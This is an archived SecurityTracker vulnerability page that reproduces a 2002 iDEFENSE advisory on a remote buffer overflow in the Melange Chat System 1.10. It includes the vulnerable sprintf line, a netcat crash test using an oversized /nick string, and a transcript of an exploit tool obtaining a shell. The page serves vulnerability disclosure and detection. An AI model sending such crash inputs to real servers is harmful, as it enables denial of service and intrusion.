SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (Instant Messaging/IRC/Chat)  >   Melange Chat System Vendors:   Walter, Christian
Melange Chat System Buffer Overflow Lets Remote Users Execute Arbitrary Code on the System
SecurityTracker Alert ID:  1005831
SecurityTracker URL:  http://securitytracker.com/id/1005831
CVE Reference:   CVE-2002-1351   (Links to External Site)
Updated:  Jun 3 2008
Original Entry Date:  Dec 18 2002
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.10
Description:   A buffer overflow vulnerability was reported in the Melange Chat System. A remote user can crash the server or execute arbitrary code on the system.

iDEFENSE reported that a buffer overflow exists in the chat_InterpretData() function of the 'interpret.c' file, where user-supplied data is written to the msgText buffer and can be used to modify the instruction pointer. A remote user can connect to the server and send specially crafted data to trigger the overflow and execute arbitrary code on the system. The code will run with the privileges of the Melange server.

The following demonstration exploit method can be used to test if a target is vulnerable (based on whether the server shuts down or not):

$ nc localhost 6666
+++Online
>> Melange Chat Server (Version 1.10), Apr-25-1999

Welcome ! (Type /HELP for a list of commands)
/nick AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> Your new name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (Line 0).
AAAAAAAAAAAAA..['A' repeated total of 480 times]..AAA
[0, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]:
AAAAAAAAAAAAA..['A' repeated total of 480 times]..AAA>> The administrator
shut down the server !
+++Quit

[Editor's note: A similar flaw, or perhaps the same flaw, was reported in April 2002 in Alert ID #1004039. In that Alert, a buffer overflow involving the '/yell' command was described.]

Impact:   A remote user can crash the server or execute arbitrary code with the privileges of the Melange daemon.
Solution:   No solution was available at the time of this entry. The vendor is no longer providing support for the system and has stated that there are known security concerns.
Vendor URL:  melange.terminal.at/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  iDEFENSE: Melange Chat System Remote Buffer Overflow


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 12.16.02b:
http://www.idefense.com/advisory/12.16.02b.txt
Melange Chat System Remote Buffer Overflow
December 16, 2002

I. BACKGROUND

Christian Walter's Melange Chat System is a chat client/server that
provides an easy way to set up your own, power full chat. More information
is available at http://melange.terminal.at .

II. DESCRIPTION

Remote exploitation of a buffer overflow in Melange allows an attacker to
crash the application and, in some cases, execute arbitrary code. The
vulnerable area of code is found within interpret.c, chat_InterpretData(),
line 55: 

sprintf(msgText,"<%d-%d, %s>:
%s",mClient[sender].channel,sender,mClient[sender].name,data);

The overflow occurs in the msgText buffer. This provides an attacker with
control over the frame pointer and the last byte of the instruction
pointer. If the instruction pointer can be modified to a "move %ebp, %esp"
or a jump to such a move and place the address of arbitrary instructions
in to %ebp, access to the system under the privileges of the user running
the chat server is possible.

The following transcript demonstrates successful exploitation against
Melange compiled with GCC 2.95.3 against GLIBC v1.2.9:

$ ./chester -t 2 -h -p 6666
[i] Building string
. 0x8077d9c as ebptag
. 0xbfffdb97 as poptag
. 0x78 as iptag
. 0 as allign
[i] Creating Connection.
[0] Sending Normal Nick Change
[1] Sending Pop Write
[2] Sending Long Nick Change
[3] Sending Crash String
[i] Trying to trigger shell...
Linux vmlinux 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown
uid=501(farmer) gid=501(farmer) groups=501(farmer) 

III. ANALYSIS

Remote exploitation of the vulnerability allows an attacker to crash the
server. Exploitation can also provide a remote attacker with local access
to the target system. This can then be employed to launch privilege
escalation attacks.

IV. DETECTION

Melange Chat System 1.10, when compiled with GCC 2.95.3 against GLIBC
v1.2.9, is vulnerable. Use the following steps to determine
susceptibility:

$ nc localhost 6666
+++Online
>> Melange Chat Server (Version 1.10), Apr-25-1999

Welcome ! (Type /HELP for a list of commands)
/nick AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> Your new name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (Line 0).
AAAAAAAAAAAAA..['A' repeated total of 480 times]..AAA
[0, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]: 
AAAAAAAAAAAAA..['A' repeated total of 480 times]..AAA>> The administrator
shut down the server !
+++Quit 

If the server shuts down as shown above, then it is vulnerable. 

V. VENDOR RESPONSE

Walter pointed to a message on the main web site that states, "Due to lack
of time development on the melange chat system and support had to be
abandon. You may go on now, but keep in mind that there was no update for
a long time. THERE ARE KNOWN BUGS AND SECURITY CONCERNS, SO USING MELANGE
IS ON YOUR OWN RISK!"

VI. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has
assigned the identification number CAN-2002-1351 to this issue.

VII. DISCLOSURE TIMELINE

10/24/2002	Issue disclosed to iDEFENSE
11/22/2002	Author notified (chris@terminal.at)
11/25/2002	iDEFENSE clients notified
12/01/2002	Second contact attempt with author
12/09/2002	Third contact attempt with author
12/16/2002	Public Disclosure

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBPf8s7/rkky7kqW5PEQJE7wCgmb0bnNQCrJ5kwOSuNhmhv+WM6/IAnjkE
92L50F6bhouLsip+5zZItXmN
=Ud+L
-----END PGP SIGNATURE-----



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC